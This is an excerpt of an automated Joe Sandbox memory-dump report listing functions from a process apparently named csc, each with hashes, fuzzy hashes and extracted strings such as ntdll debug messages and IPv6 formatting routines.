                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fea4275582fe4d8b4f0d520515676088bbdc6378d9011ceaa3515df3284747d9
                                                                                  • Instruction ID: 8c2f5a8ca549c3a5f007b8f2c209657fbef13e2249c8f1d085bcdcf6a74693a6
                                                                                  • Opcode Fuzzy Hash: fea4275582fe4d8b4f0d520515676088bbdc6378d9011ceaa3515df3284747d9
                                                                                  • Instruction Fuzzy Hash: 17900222211C0042D60475685C54B070015C7E1303F95C125A0158564CC91589616537
                                                                                  Function 05782FB0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf9510cd135ae373986bf2056ed3fb94fb0c4f9437083b6d52ef6bb40424c1e3
                                                                                  • Instruction ID: 1c7bcb0afebc9503ebc457cc3ce6bff6c995d6b400394eccf9b67d035adb676c
                                                                                  • Opcode Fuzzy Hash: bf9510cd135ae373986bf2056ed3fb94fb0c4f9437083b6d52ef6bb40424c1e3
                                                                                  • Instruction Fuzzy Hash: 84900222601400424544716898849064015EBF2211795C131A099C560D85598965667B
                                                                                  Function 05782FA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebc1fcb7fb34777677537a1adba1e8b9375e5145afacd184a375eb014b237af1
                                                                                  • Instruction ID: be0d4569aea0f76efe077bc7f72fdea74729e979e085aa9ec82e65fbe45f5bc4
                                                                                  • Opcode Fuzzy Hash: ebc1fcb7fb34777677537a1adba1e8b9375e5145afacd184a375eb014b237af1
                                                                                  • Instruction Fuzzy Hash: 4190023220180402D504715858487470015C7E1302F95C021A5168565E8665C9917537
                                                                                  Function 05782F90 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcee81dc4e02bd0d2f9d201c2e96ba96b89ebfb8d50ff54c007e1a12dc4cca1d
                                                                                  • Instruction ID: 263061807b27e350fb149eaced9254e9456557cee47f8f3a9c6a8a43e7e31b77
                                                                                  • Opcode Fuzzy Hash: fcee81dc4e02bd0d2f9d201c2e96ba96b89ebfb8d50ff54c007e1a12dc4cca1d
                                                                                  • Instruction Fuzzy Hash: 1390023220180402D5047158585470B0015C7E1302F95C021A1168565D862589517577
                                                                                  Function 05782E30 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7374b3871f45a7ff75b9f6dca622558df78218fe26f6355093881e58f4eb7415
                                                                                  • Instruction ID: 6fba392310fe3c6e2db52e38f51835f24d7957632b5ffacbcc3e5414a4ed80f9
                                                                                  • Opcode Fuzzy Hash: 7374b3871f45a7ff75b9f6dca622558df78218fe26f6355093881e58f4eb7415
                                                                                  • Instruction Fuzzy Hash: 0790022230140402D506715854546060019C7E2345FD5C022E1428565D86258A53B137
                                                                                  Function 05782EE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6590539cc6822b6fe2bfacb7dd09ef3ebe103446a0bbc0cb3bb83d12d8bcfc4e
                                                                                  • Instruction ID: b03fba320e611419de3062142d1cac5b76cc7d86448b28b9091d3e07b5b6ad9c
                                                                                  • Opcode Fuzzy Hash: 6590539cc6822b6fe2bfacb7dd09ef3ebe103446a0bbc0cb3bb83d12d8bcfc4e
                                                                                  • Instruction Fuzzy Hash: 3C90026220180403D544755858446070015C7E1302F95C021A2068565E8A298D51713B
                                                                                  Function 05782EA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 65a4be611523d5484a16c94ba70337d55db36056e3190c0deca18f00d6f762c4
                                                                                  • Instruction ID: 7acfe4870ed5f4e1c0ac0f5fbfeaa3779b36f5d6a20f5d524c60d71a9f719b6c
                                                                                  • Opcode Fuzzy Hash: 65a4be611523d5484a16c94ba70337d55db36056e3190c0deca18f00d6f762c4
                                                                                  • Instruction Fuzzy Hash: 6B90027220140402D544715854447460015C7E1301F95C021A5068564E86598ED5767B
                                                                                  Function 05782E80 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45b654d9072a6b7bd421f9755becebcc867c5f493ac3128df528a1d41ad61f65
                                                                                  • Instruction ID: efdb84e73ea6910645800ddf76d5267e660f9ce28ed7b4caee01ac9a3ef4228c
                                                                                  • Opcode Fuzzy Hash: 45b654d9072a6b7bd421f9755becebcc867c5f493ac3128df528a1d41ad61f65
                                                                                  • Instruction Fuzzy Hash: 9690022260140502D50571585444616001AC7E1241FD5C032A1028565ECA258A92B137
                                                                                  Function 05782BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2c5b2d05bb90f620300953f76bde7e11ed9c5b2e40b45ab391ed993495874ec
                                                                                  • Instruction ID: 5aad2c7b641d81037b636d204e6e8f38925d4db5ff3542212df7b157046ca624
                                                                                  • Opcode Fuzzy Hash: e2c5b2d05bb90f620300953f76bde7e11ed9c5b2e40b45ab391ed993495874ec
                                                                                  • Instruction Fuzzy Hash: BF90023220140802D5847158544464A0015C7E2301FD5C025A0029664DCA158B5977B7
                                                                                  Function 05782BE0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad56cf2d1679a2a16bed6bad67019b80164eaee5a26a60df0b718668b36c84ee
                                                                                  • Instruction ID: 4aa5d11ff8ccac7b8942eb20be67a525a3d6febc3442acbd72bab0c81ac5e11d
                                                                                  • Opcode Fuzzy Hash: ad56cf2d1679a2a16bed6bad67019b80164eaee5a26a60df0b718668b36c84ee
                                                                                  • Instruction Fuzzy Hash: A090023220544842D54471585444A460025C7E1305F95C021A00686A4D96258E55B677
                                                                                  Function 05782BA0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26e4ee425636cf4fa8c9e33cb37f91cdd33adcf79927b0c083546e5c2073c9e1
                                                                                  • Instruction ID: 870f0980361d0918f2c5142ca6eaa472bf7c1e783bcd68a05a8ed61f64b86cf0
                                                                                  • Opcode Fuzzy Hash: 26e4ee425636cf4fa8c9e33cb37f91cdd33adcf79927b0c083546e5c2073c9e1
                                                                                  • Instruction Fuzzy Hash: F490023260540802D554715854547460015C7E1301F95C021A0028664D87558B5576B7
                                                                                  Function 05782B80 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 86a343c74d223e1df81e56a3531a62c97820e011805cf7ef32cfec08a7246af8
                                                                                  • Instruction ID: 263ea29b569cd825b5758181e8220cc6e08af3b6c31f83594e5585094769b90e
                                                                                  • Opcode Fuzzy Hash: 86a343c74d223e1df81e56a3531a62c97820e011805cf7ef32cfec08a7246af8
                                                                                  • Instruction Fuzzy Hash: 9290023220140802D508715858446860015C7E1301F95C021A6028665E966589917137
                                                                                  Function 05782AF0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c203da54a3dd1156651c93ec3bd882e6d9ad91706cd0aea187c83cad218424f9
                                                                                  • Instruction ID: fe9968ead6adfb2cbc3b38ddfed37325bd62ef34541e1b3fff45f17c4c1b2f9f
                                                                                  • Opcode Fuzzy Hash: c203da54a3dd1156651c93ec3bd882e6d9ad91706cd0aea187c83cad218424f9
                                                                                  • Instruction Fuzzy Hash: F6900226221400020549B558164450B0455D7E73513D5C025F141A5A0CC62189656337
                                                                                  Function 05782AD0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4aa91d98158d576665ab69462c5ed3559a98faaa498334b2d804629ef2296b35
                                                                                  • Instruction ID: 4872afff175925c5dc2c25b422d03fe989292bfe02daff1fbf23d7f67db5d269
                                                                                  • Opcode Fuzzy Hash: 4aa91d98158d576665ab69462c5ed3559a98faaa498334b2d804629ef2296b35
                                                                                  • Instruction Fuzzy Hash: 0F900226211400030509B55817445070056C7E6351395C031F1019560CD62189616137
                                                                                  Function 05782AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c3e3b5a478271a53aff5e2d6ebd2df88a127249fc05320f654e0aecfec7fdfd
                                                                                  • Instruction ID: 399e633894bdc3cd6ddcf0d2577f851c5db80e0b132cfe52beb9f6337f86ec93
                                                                                  • Opcode Fuzzy Hash: 6c3e3b5a478271a53aff5e2d6ebd2df88a127249fc05320f654e0aecfec7fdfd
                                                                                  • Instruction Fuzzy Hash: E99002A2201540924904B2589444B0A4515C7F1201B95C026E1058570CC5258951A13B
                                                                                  Function 05783010 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f04bab7d56d9f188b0d4e2bf87ce42f5ea97e2d6c65f86afa3ceb86cfbc9366f
                                                                                  • Instruction ID: b2444cf8eb301e852832da6b41e1ebda62581183cb72ad87cb901c2fb2d0895e
                                                                                  • Opcode Fuzzy Hash: f04bab7d56d9f188b0d4e2bf87ce42f5ea97e2d6c65f86afa3ceb86cfbc9366f
                                                                                  • Instruction Fuzzy Hash: 1990022220184442D54472585844B0F4115C7F2202FD5C029A415A564CC91589556737
                                                                                  Function 05783090 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 21fa56e53da2903e4d24a22b2b3b5b27f4cb007328a1880441c8b69d723a1e5c
                                                                                  • Instruction ID: 5b9109152f280584ac52624db7bf5fdc48402b20e0bf694289066b094a64699c
                                                                                  • Opcode Fuzzy Hash: 21fa56e53da2903e4d24a22b2b3b5b27f4cb007328a1880441c8b69d723a1e5c
                                                                                  • Instruction Fuzzy Hash: 0790022224140802D544715894547070016C7E1601F95C021A0028564D86168A6576B7
                                                                                  Function 05783D70 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 691fb1f31263f8cc070d4f29f578d597d257e571018f3848e5899a4b30df93b1
                                                                                  • Instruction ID: ad29dfd671c64edc320d1b75557a5a8f7f5d36d85ac864950bb168e22c682d2a
                                                                                  • Opcode Fuzzy Hash: 691fb1f31263f8cc070d4f29f578d597d257e571018f3848e5899a4b30df93b1
                                                                                  • Instruction Fuzzy Hash: C090023620140402D914715868446460056C7E1301F95D421A0428568D865489A1B137
                                                                                  Function 05783D10 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 799f1675939ab1b80a989455dfe9ed4d6daf4a164a8e2b662205c3d4bb404fbb
                                                                                  • Instruction ID: 146bd4110ed60705619b35cf5f35b298e7118fb2d76d5657979392c205bc0839
                                                                                  • Opcode Fuzzy Hash: 799f1675939ab1b80a989455dfe9ed4d6daf4a164a8e2b662205c3d4bb404fbb
                                                                                  • Instruction Fuzzy Hash: F090023220240142994472586844A4E4115C7F2302BD5D425A0019564CC91489616237
                                                                                  Function 057839B0 Relevance: .0, Instructions: 4COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aa671d47e3b312dec1516fa26246cb2ed7bae49f24f149f8a4de626c0083b1cf
                                                                                  • Instruction ID: 646a51ab3d5e178eb3f0f00260fb3375309746ae24cf1a52db9d9f8e1b8f9987
                                                                                  • Opcode Fuzzy Hash: aa671d47e3b312dec1516fa26246cb2ed7bae49f24f149f8a4de626c0083b1cf
                                                                                  • Instruction Fuzzy Hash: E590022224545102D554715C54446164015E7F1201F95C031A08185A4D855589557237
                                                                                  Function 05782C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: dc936c6981224e0da4fadac4bb91cfefbcd80ed2b176b26a080b688f5caac374
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 05782890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 727b972eeda72b2a02a81b6d2316bb6880213eea7f6080fb4fe721731554cac1
                                                                                  • Instruction ID: c9ff9eb5c3b1068d778c5bab9777c9b8248ef34a1000b2039fa487610e52731d
                                                                                  • Opcode Fuzzy Hash: 727b972eeda72b2a02a81b6d2316bb6880213eea7f6080fb4fe721731554cac1
                                                                                  • Instruction Fuzzy Hash: BB51F8B5B04116BFDF24EFAD888497EF7B9BF082017508129E465D7642E274DF50ABA0
                                                                                  Function 057F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 3a0e2d59f81341ade8cf54a19f2d76ae685b11322c09f2b765e0103dab5e35e2
                                                                                  • Instruction ID: 44b0c3f3f8b1abbcd3661862615ffef57ed23aebe2ae397dba4e0c90948d9e50
                                                                                  • Opcode Fuzzy Hash: 3a0e2d59f81341ade8cf54a19f2d76ae685b11322c09f2b765e0103dab5e35e2
                                                                                  • Instruction Fuzzy Hash: 15510679B04645AFCB30DF9DCC9087EB7FAEB44200B008859E696C7742D6B4DE00E760
                                                                                  Function 05777630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Execute=1, xrefs: 057B4713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 057B4742
                                                                                  • ExecuteOptions, xrefs: 057B46A0
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 057B4725
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 057B4655
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 057B46FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 057B4787
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: da04c2663c7fadfc63bfaa62a68613f08a2ee94ba0dd45cff6b8b06a831dc5e9
                                                                                  • Instruction ID: 31d19b408603f5d9a7e6829b3ea0b0824f250507d451da622cf497b2dbcca5bf
                                                                                  • Opcode Fuzzy Hash: da04c2663c7fadfc63bfaa62a68613f08a2ee94ba0dd45cff6b8b06a831dc5e9
                                                                                  • Instruction Fuzzy Hash: A351E47160021DBAEF14EEA4EC89FF977AAFB04304F0404E9E506E7181EB71AA41EA54
                                                                                  Function 0578B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                  • Instruction ID: 26ac2e3dee9fb05e06948292362da425d857f67f0e017a8bd0ecc7fc71780ff5
                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                  • Instruction Fuzzy Hash: E781D770F852499EDF24EF68C8917FEBBB2BF45310F18415AD89AA72D1C7349840E754
                                                                                  Function 0576F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 057B02BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 057B02E7
                                                                                  • RTL: Re-Waiting, xrefs: 057B031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 1b99c635684f12e6070175d3356c349f448b20ab4225cf0d4bdc5f463240b710
                                                                                  • Instruction ID: c4bbe563074a6b59e5f5e2e8c19e121f75d73109fe3e0cd78b0489b8fa19abfb
                                                                                  • Opcode Fuzzy Hash: 1b99c635684f12e6070175d3356c349f448b20ab4225cf0d4bdc5f463240b710
                                                                                  • Instruction Fuzzy Hash: 75E1C0706087419FE725CF28D888B6AB7E1BF84314F140A5DF9A68B2E1D774E944EB42
                                                                                  Function 0577BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 057B7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 057B7B7F
                                                                                  • RTL: Re-Waiting, xrefs: 057B7BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 703c80937a99d2411d0405c06f0cc00b9baa55c2dd8257b4140296ab81ce2648
                                                                                  • Instruction ID: a850228f86c100479516c169d8ff33713ac65e87d97bab86a4a28746d6662230
                                                                                  • Opcode Fuzzy Hash: 703c80937a99d2411d0405c06f0cc00b9baa55c2dd8257b4140296ab81ce2648
                                                                                  • Instruction Fuzzy Hash: BB41D1713047069FDB24DE25D844F6BB7E6FF88B10F000A1DE85AD7680EB71E905AB91
                                                                                  Function 0577B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 057B728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 057B72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 057B7294
                                                                                  • RTL: Re-Waiting, xrefs: 057B72C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: b22b50424ef40a30c2576dcb2a5b2f4def6c93679268e9102ef4bac497b23df3
                                                                                  • Instruction ID: 69cc3ae6bb86435e137552ee4beb8c70f5124737e5c7051d021d5ce5ca5332a2
                                                                                  • Opcode Fuzzy Hash: b22b50424ef40a30c2576dcb2a5b2f4def6c93679268e9102ef4bac497b23df3
                                                                                  • Instruction Fuzzy Hash: 8641FF31704206ABDB24DE25DC45FAAB7B6FB84710F100619F959EB240EB71E842EBD1
                                                                                  Function 057F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
